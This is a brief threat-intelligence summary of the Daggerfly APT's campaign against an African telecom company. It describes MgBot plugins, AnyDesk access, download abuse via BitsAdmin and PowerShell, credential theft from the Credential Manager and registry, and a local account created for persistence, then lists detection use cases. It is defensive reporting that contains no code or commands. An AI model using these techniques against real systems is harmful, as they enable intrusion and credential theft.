Daggerfly APT Sets Its Sights on African Telecoms Corporation

Category: Threat Actor Activity | Industry: Telecommunications | Level: Tactical | Source: Symantec

The Daggerfly advanced persistent threat group, (aka Evasive Panda or Bronze Highland) was observed to have a telecommunications organization in Africa as part of its latest campaign. Symantec researchers from their Threat Hunter Team discovered Daggerfly operators deployed "unseen plugins from the MgBot malware framework." The attribution of this campaign to Daggerfly was based on shared tactics, techniques, and procedures (TTPs) observed in a prior Daggerfly intrusion. These included the reuse of folders, file names, a MgBot sample, and a loader DLL, as well as the deployment of 'dbengin.exe' a rename of Rundll32.exe. Symantec first identified signs of an infection targeting the telecom company in November 2022 through a suspicious AnyDesk connection to a Microsoft Exchange mail server.

The Exchange server was plagued with the WannaMine crypto-miner, however, it is undetermined if this activity was part of Daggerfly's campaign. It’s only evidence the compromised Microsoft Exchange was "unpatched and vulnerable to the EternalBlue exploit." Daggerfly operators made use of BitsAdmin and PowerShell to download tools and scripts. One of the downloaded scripts was the "GetCredManCreds" used to gather credentials and accounts from web services. Credentials were also gathered from the Windows registry hives. The threat actors then proceeded to create a local account for persistence. Daggerfly's objectives are assessed to launch “intelligence gathering campaigns” against intelligence-rich organizations such as telecommunications companies “due to the access they can potentially provide to the communications of end-users."

Anvilogic Scenario:

• BITSadmin Abuse for Host Compromise

Anvilogic Use Cases:

• BITSadmin Execution
• AnyDesk Command Line Execution
• Credentials in Registry

‍